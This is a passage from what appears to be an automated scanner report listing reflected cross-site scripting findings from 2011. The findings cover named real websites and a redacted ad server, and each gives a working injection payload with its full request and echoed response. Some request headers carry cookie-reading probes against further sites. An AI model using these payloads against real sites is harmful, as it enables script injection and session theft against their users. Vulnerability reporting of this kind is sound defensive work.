4.45. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882218266; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=f642355c896d83fe703b92dbf7d4cbd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26018


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="/fca/index.php?6f2fa"><script>alert(1)</script>7a7277b34d3=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.46. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460887085136; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=81465b85641fb95bc04d846351eba1e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40019


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="/hc/index.php?b6d57"><script>alert(1)</script>5968cea9b03=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.47. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460883243148; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=93a86fa73ffca397505be2273bb8a129; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<iframe src="/sec/index.php?81116"><script>alert(1)</script>ab7d185670b=1&attorneys=1&inline=1" frameborder="0" scrolling="auto" name="primarycontact" allowtransparency="true" background-color="transparent">
...[SNIP]...

4.48. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882882759; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=31dc20249a9ecac44a1bd41ef91f6911; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<a href="/sec/index.php?7ae3b"><script>alert(1)</script>cc7c0c0318c=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.49. http://twittercounter.com/embed/ [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://twittercounter.com
Path:   /embed/

Issue detail

The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:03:39 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Sat, 29 Jan 2011 18:03:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 448

       <!--
       document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank">
...[SNIP]...

4.50. http://REDACTED/284152846/direct/01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f21b'%3b3d19e4067f1 was submitted in the REST URL parameter 4. This input was echoed as 7f21b';3d19e4067f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct7f21b'%3b3d19e4067f1/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic? HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6714
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:59 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<param name="movie" value="HTTP://REDACTED.com/ds/I2IWCTHD1THD/HomeServices/728x90_35_thd_hs_windows_revised.swf?ver=1&clickTag1=!~!click!~!http://REDACTED.com/go/284152846/direct7f21b';3d19e4067f1;ai.196212142;ct.1/01&clickTag=!~!click!~!http://REDACTED.com/go/284152846/direct7f21b';3d19e4067f1;ai.196212142;ct.1/01" />
...[SNIP]...

4.51. http://REDACTED/284152846/direct/01 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83606"-alert(1)-"a5366a597f2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?83606"-alert(1)-"a5366a597f2 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
2 >= nRequiredVersion);
}
}
}
detectPluginTHD1293044987106();
var _THD1293044987106_Instance =
{
click : "http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?83606"-alert(1)-"a5366a597f2",
clickThruUrl: "http://REDACTED.com/go/284152846/direct;ai.196212142;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

4.52. http://REDACTED/284152846/direct/01 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b235"><script>alert(1)</script>4441186ab6f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235"><script>alert(1)</script>4441186ab6f HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6767
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235"><script>alert(1)</script>4441186ab6f\')(new Image).src=\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235">
...[SNIP]...

4.53. http://REDACTED/284152846/direct/01 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b22'-alert(1)-'7388b2ddfcf was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?c0b22'-alert(1)-'7388b2ddfcf HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:40 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
ace(/!~!click!~!/g,'');
else
_strContentTHD1293044987106 = _strContentTHD1293044987106.replace(/!~!click!~!/g,'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?c0b22'-alert(1)-'7388b2ddfcf');
}
else
{
_strContentTHD1293044987106 = '<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9
...[SNIP]...

4.54. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb45'-alert(1)-'36c4d6a038a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&ecb45'-alert(1)-'36c4d6a038a=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:45 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
ce(/!~!click!~!/g,'');
else
_strContentTHD1293044987106 = _strContentTHD1293044987106.replace(/!~!click!~!/g,'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&ecb45'-alert(1)-'36c4d6a038a=1');
}
else
{
_strContentTHD1293044987106 = '<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756
...[SNIP]...

4.55. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f836"><script>alert(1)</script>c59229a215b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836"><script>alert(1)</script>c59229a215b=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6782
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836"><script>alert(1)</script>c59229a215b=1\')(new Image).src=\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836">
...[SNIP]...

4.56. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fa6"-alert(1)-"b006579a593 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&14fa6"-alert(1)-"b006579a593=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
>= nRequiredVersion);
}
}
}
detectPluginTHD1293044987106();
var _THD1293044987106_Instance =
{
click : "http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&14fa6"-alert(1)-"b006579a593=1",
clickThruUrl: "http://REDACTED.com/go/284152846/direct;ai.196212142;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

4.57. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:51 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=44629bb917943f5c30c4192d9464a313dab56ab4; path=/; expires=Wed, 19-Jan-2011 19:15:51 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
rn result[1];
}

function redirect() {

window.location = "http://www.google.com";
}

// channel: "sports",


/*var google_afd_request = {

client: "ca-dp-sphere_related_xml",
domain_name: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
s: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
hl: "en"
}*/


var google_afd_request = {
client: 'ca-dp-sphere_related_xml',
domain_name: "e35
...[SNIP]...

4.58. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:36 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=c0caa9ec1522c80f906fc7eb2fe5b51232878fd2; path=/; expires=Wed, 19-Jan-2011 19:15:36 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
nction also_click()
{

var success = function(){};
var failure = function(){};
var callback = {success:success,failure:failure};

var url = "/domainserve/domainClick?viewid=557127573&searchid=&dn=f37b7";alert(1)//97f91a6f73c.f37b7";alert(1)//97f91a6f73c&ajax=1";
var request = YAHOO.util.Connect.asyncRequest("GET", url, callback);
setTimeout(function(){},100);

}

function blocked(status)
{
var success = function(){};
...[SNIP]...

4.59. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1
Host: web2.domainmall.com
